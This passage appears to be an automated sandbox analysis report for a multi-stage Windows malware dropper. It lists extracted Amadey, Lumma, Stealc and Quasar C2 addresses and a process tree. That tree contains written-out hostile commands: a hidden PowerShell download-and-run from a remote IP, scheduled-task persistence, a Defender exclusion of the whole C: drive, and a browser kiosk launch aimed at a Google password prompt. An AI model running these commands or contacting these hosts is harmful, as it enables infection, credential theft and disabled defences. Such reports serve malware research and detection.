Overview

overview

10

Static

static

5

2025-03-30...er.exe

windows7-x64

10

2025-03-30...er.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/03/2025, 14:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-03-30_c3b17afceb80ee32959f39363a6c5833_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    c3b17afceb80ee32959f39363a6c5833

  • SHA1

    f8f30ea8788690a21b19accddfeeb0a451153fcc

  • SHA256

    bf4d126635ad6168fb179b698eb0f603af274e2fddaf2c7fd386106e491a6155

  • SHA512

    c37cadc02fab8f769ffd18013a623fc8a91ee716a8026d0b1e1241943def0447126d06f38b00bce5e2ef07dbd58a913d16d5e3d9ab19a3e6f947b3c4dedee37a

  • SSDEEP

    24576:ZqDEvCTbMWu7rQYlBQcBiT6rprG8a0nu:ZTvC/MTQYxsWR7a0n

Score
10/10
amadeygcleanerhealerlummaquasarstealc092155office04trumpbootkitdefense_evasiondiscoverydropperevasionexecutionloaderpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

https://cosmosyf.top/GOsznj

https://byteplusx.digital/aXweAX

https://skynetxc.live/AksoPA

https://pixtreev.run/LkaUz

https://sparkiob.digital/KeASUp

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
    defense_evasion
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 15 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Sets service image path in registry 2 TTPs 2 IoCs
    persistence
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Impair Defenses: Safe Mode Boot 1 TTPs 3 IoCs
    defense_evasion
  • Loads dropped DLL 15 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Adds Run key to start application 2 TTPs 8 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 52 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 7 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 7 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 29 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2168
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:6384
    • C:\Users\Admin\AppData\Local\Temp\2025-03-30_c3b17afceb80ee32959f39363a6c5833_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-03-30_c3b17afceb80ee32959f39363a6c5833_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4616
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn pmBKTmaEzpe /tr "mshta C:\Users\Admin\AppData\Local\Temp\iQnC9OIow.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2944
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn pmBKTmaEzpe /tr "mshta C:\Users\Admin\AppData\Local\Temp\iQnC9OIow.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:3644
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\iQnC9OIow.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4008
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PBKPZNSDRWLDYUI8SWVYQ6ZLSID6ESSG.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3632
          • C:\Users\Admin\AppData\Local\TempPBKPZNSDRWLDYUI8SWVYQ6ZLSID6ESSG.EXE
            "C:\Users\Admin\AppData\Local\TempPBKPZNSDRWLDYUI8SWVYQ6ZLSID6ESSG.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2728
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:5088
              • C:\Users\Admin\AppData\Local\Temp\10381850101\cb1667a0ee.exe
                "C:\Users\Admin\AppData\Local\Temp\10381850101\cb1667a0ee.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4272
              • C:\Users\Admin\AppData\Local\Temp\10381860101\98aa894168.exe
                "C:\Users\Admin\AppData\Local\Temp\10381860101\98aa894168.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:672
              • C:\Users\Admin\AppData\Local\Temp\10381870101\1ddd25bc5b.exe
                "C:\Users\Admin\AppData\Local\Temp\10381870101\1ddd25bc5b.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:1728
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM firefox.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4092
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM chrome.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1324
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM msedge.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4448
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM opera.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5000
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM brave.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2284
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4344
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    8⤵
                    • Checks processor information in registry
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:784
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2020 -prefsLen 27099 -prefMapHandle 2024 -prefMapSize 270279 -ipcHandle 2104 -initialChannelId {a7f075cd-2deb-4bf2-a8d0-5080c04af744} -parentPid 784 -crashReporter "\\.\pipe\gecko-crash-server-pipe.784" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                      9⤵
                        PID:1708
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2508 -prefsLen 27135 -prefMapHandle 2512 -prefMapSize 270279 -ipcHandle 2520 -initialChannelId {8b985acc-991c-42e0-aaef-108bd19f5e98} -parentPid 784 -crashReporter "\\.\pipe\gecko-crash-server-pipe.784" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                        9⤵
                          PID:2580
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3840 -prefsLen 25164 -prefMapHandle 3844 -prefMapSize 270279 -jsInitHandle 3848 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3856 -initialChannelId {7985c98b-98bb-4deb-8233-db59793ef207} -parentPid 784 -crashReporter "\\.\pipe\gecko-crash-server-pipe.784" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                          9⤵
                          • Checks processor information in registry
                          PID:1880
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4008 -prefsLen 27276 -prefMapHandle 4012 -prefMapSize 270279 -ipcHandle 3816 -initialChannelId {c0f65e4d-2da0-4c66-930d-06f18ee4e8e7} -parentPid 784 -crashReporter "\\.\pipe\gecko-crash-server-pipe.784" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                          9⤵
                            PID:5084
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4420 -prefsLen 34775 -prefMapHandle 4424 -prefMapSize 270279 -jsInitHandle 4428 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4436 -initialChannelId {73220c63-98d2-4fa5-938d-7d456d5992af} -parentPid 784 -crashReporter "\\.\pipe\gecko-crash-server-pipe.784" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                            9⤵
                            • Checks processor information in registry
                            PID:3720
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4916 -prefsLen 34905 -prefMapHandle 4928 -prefMapSize 270279 -ipcHandle 4964 -initialChannelId {9697df73-04df-474d-8002-1e89fb08328d} -parentPid 784 -crashReporter "\\.\pipe\gecko-crash-server-pipe.784" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                            9⤵
                            • Checks processor information in registry
                            PID:5344
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5332 -prefsLen 32952 -prefMapHandle 5336 -prefMapSize 270279 -jsInitHandle 5340 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5348 -initialChannelId {7faba9bf-652d-41c5-9e93-09434177f44e} -parentPid 784 -crashReporter "\\.\pipe\gecko-crash-server-pipe.784" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                            9⤵
                            • Checks processor information in registry
                            PID:2208
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5556 -prefsLen 32952 -prefMapHandle 5552 -prefMapSize 270279 -jsInitHandle 5548 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5516 -initialChannelId {d5c9712e-f6ec-48ae-8c31-0923fc5811b5} -parentPid 784 -crashReporter "\\.\pipe\gecko-crash-server-pipe.784" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                            9⤵
                            • Checks processor information in registry
                            PID:5204
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5720 -prefsLen 32952 -prefMapHandle 5724 -prefMapSize 270279 -jsInitHandle 5728 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5732 -initialChannelId {74d13779-ec7a-4b9b-9e47-575b63df12c2} -parentPid 784 -crashReporter "\\.\pipe\gecko-crash-server-pipe.784" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                            9⤵
                            • Checks processor information in registry
                            PID:5308
                    • C:\Users\Admin\AppData\Local\Temp\10381880101\19114c195b.exe
                      "C:\Users\Admin\AppData\Local\Temp\10381880101\19114c195b.exe"
                      6⤵
                      • Modifies Windows Defender DisableAntiSpyware settings
                      • Modifies Windows Defender Real-time Protection settings
                      • Modifies Windows Defender TamperProtection settings
                      • Modifies Windows Defender notification settings
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Windows security modification
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:888
                    • C:\Users\Admin\AppData\Local\Temp\10381890101\2f56f74f53.exe
                      "C:\Users\Admin\AppData\Local\Temp\10381890101\2f56f74f53.exe"
                      6⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5784
                    • C:\Users\Admin\AppData\Local\Temp\10381900101\c9c7f0ab08.exe
                      "C:\Users\Admin\AppData\Local\Temp\10381900101\c9c7f0ab08.exe"
                      6⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:5316
                    • C:\Users\Admin\AppData\Local\Temp\10381910101\47e237f09e.exe
                      "C:\Users\Admin\AppData\Local\Temp\10381910101\47e237f09e.exe"
                      6⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4984
                      • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                        "C:\Users\Admin\AppData\Local\Temp\10381910101\47e237f09e.exe"
                        7⤵
                        • Downloads MZ/PE file
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:6028
                    • C:\Users\Admin\AppData\Local\Temp\10381920101\c754ced93a.exe
                      "C:\Users\Admin\AppData\Local\Temp\10381920101\c754ced93a.exe"
                      6⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1328
                      • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                        "C:\Users\Admin\AppData\Local\Temp\10381920101\c754ced93a.exe"
                        7⤵
                        • Downloads MZ/PE file
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:1728
                    • C:\Users\Admin\AppData\Local\Temp\10381930101\bc59f6effc.exe
                      "C:\Users\Admin\AppData\Local\Temp\10381930101\bc59f6effc.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2136
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:5304
                    • C:\Users\Admin\AppData\Local\Temp\10381940101\67f14580e4.exe
                      "C:\Users\Admin\AppData\Local\Temp\10381940101\67f14580e4.exe"
                      6⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5240
                    • C:\Users\Admin\AppData\Local\Temp\10381950101\EPTwCQd.exe
                      "C:\Users\Admin\AppData\Local\Temp\10381950101\EPTwCQd.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5280
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3504
                    • C:\Users\Admin\AppData\Local\Temp\10381960101\5c228b7a4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\10381960101\5c228b7a4d.exe"
                      6⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Writes to the Master Boot Record (MBR)
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5136
                    • C:\Users\Admin\AppData\Local\Temp\10381970101\u75a1_003.exe
                      "C:\Users\Admin\AppData\Local\Temp\10381970101\u75a1_003.exe"
                      6⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: MapViewOfSection
                      PID:3568
                      • C:\Windows\SYSTEM32\cmd.exe
                        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                        7⤵
                          PID:6136
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe Add-MpPreference -ExclusionPath 'C:'
                            8⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:468
                        • C:\Windows\system32\svchost.exe
                          "C:\Windows\system32\svchost.exe"
                          7⤵
                          • Downloads MZ/PE file
                          • Adds Run key to start application
                          PID:4584
                          • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                            "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                            8⤵
                            • Executes dropped EXE
                            PID:5412
                          • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                            "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                            8⤵
                            • Deletes itself
                            • Executes dropped EXE
                            PID:5612
                            • C:\Users\Admin\AppData\Local\Temp\{8fe7f254-3ba2-486a-8957-7e211ab2ef08}\50104004.exe
                              "C:\Users\Admin\AppData\Local\Temp\{8fe7f254-3ba2-486a-8957-7e211ab2ef08}\50104004.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                              9⤵
                              • Executes dropped EXE
                              • Checks for VirtualBox DLLs, possible anti-VM trick
                              • System Location Discovery: System Language Discovery
                              PID:9316
                              • C:\Users\Admin\AppData\Local\Temp\{e3ba5824-0a2c-496a-ad86-a48f16760151}\ea705be5.exe
                                C:/Users/Admin/AppData/Local/Temp/{e3ba5824-0a2c-496a-ad86-a48f16760151}/\ea705be5.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                                10⤵
                                • Drops file in Drivers directory
                                • Sets service image path in registry
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Impair Defenses: Safe Mode Boot
                                • Loads dropped DLL
                                • Adds Run key to start application
                                • Writes to the Master Boot Record (MBR)
                                • Checks for VirtualBox DLLs, possible anti-VM trick
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: LoadsDriver
                                • Suspicious use of AdjustPrivilegeToken
                                PID:10236
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 10236 -s 1252
                                  11⤵
                                  • Program crash
                                  PID:10628
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\{b92db209-67d4-405c-b548-933a7614087e}\bec78fb7-cb82-4078-9c9f-9ecb49669c8a.cmd" "
                                  11⤵
                                    PID:11008
                                    • C:\Windows\system32\reg.exe
                                      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v bec78fb7-cb82-4078-9c9f-9ecb49669c8a /f
                                      12⤵
                                      • Modifies registry key
                                      PID:11192
                        • C:\Users\Admin\AppData\Local\Temp\10381980101\7IIl2eE.exe
                          "C:\Users\Admin\AppData\Local\Temp\10381980101\7IIl2eE.exe"
                          6⤵
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          PID:13032
                          • C:\Windows\SysWOW64\CMD.exe
                            "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                            7⤵
                            • System Location Discovery: System Language Discovery
                            PID:13220
                            • C:\Windows\SysWOW64\tasklist.exe
                              tasklist
                              8⤵
                              • Enumerates processes with tasklist
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:7308
                            • C:\Windows\SysWOW64\findstr.exe
                              findstr /I "opssvc wrsa"
                              8⤵
                              • System Location Discovery: System Language Discovery
                              PID:7316
                            • C:\Windows\SysWOW64\tasklist.exe
                              tasklist
                              8⤵
                              • Enumerates processes with tasklist
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:7452
                            • C:\Windows\SysWOW64\findstr.exe
                              findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                              8⤵
                              • System Location Discovery: System Language Discovery
                              PID:7460
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c md 418377
                              8⤵
                              • System Location Discovery: System Language Discovery
                              PID:7524
                            • C:\Windows\SysWOW64\extrac32.exe
                              extrac32 /Y /E Leon.cab
                              8⤵
                              • System Location Discovery: System Language Discovery
                              PID:7560
                            • C:\Windows\SysWOW64\findstr.exe
                              findstr /V "BEVERAGES" Compilation
                              8⤵
                              • System Location Discovery: System Language Discovery
                              PID:7756
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                              8⤵
                              • System Location Discovery: System Language Discovery
                              PID:7812
                            • C:\Windows\SysWOW64\cmd.exe
